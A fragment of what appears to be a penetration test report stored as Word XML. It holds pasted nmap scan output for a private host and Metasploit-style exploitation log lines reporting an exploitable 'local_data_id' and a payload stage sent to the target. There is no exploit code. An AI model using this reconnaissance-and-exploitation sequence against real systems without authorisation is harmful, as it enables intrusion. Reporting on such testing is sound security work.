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Sun Jul  7 03:31:54 2024 as: nmap -sV -sC -Pn --script http-title -iL targets.txt -oN nmap_results.txt</w:t>
        <w:br/>
        <w:t>Nmap scan report for 10.33.102.225</w:t>
        <w:br/>
        <w:t>Host is up (0.00061s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(0.00066s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Sun Jul  7 03:32:02 2024 -- 2 IP addresses (2 hosts up) scanned in 7.78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10.33.102.225:51034) at 2024-07-07 03:35:08 +0700</w:t>
        <w:br/>
        <w:t>[+] Found exploitable local_data_id 15 for host_id 1</w:t>
        <w:br/>
        <w:t>[*] Sending stage (1017704 bytes) to 10.33.102.225</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10.33.102.225:51034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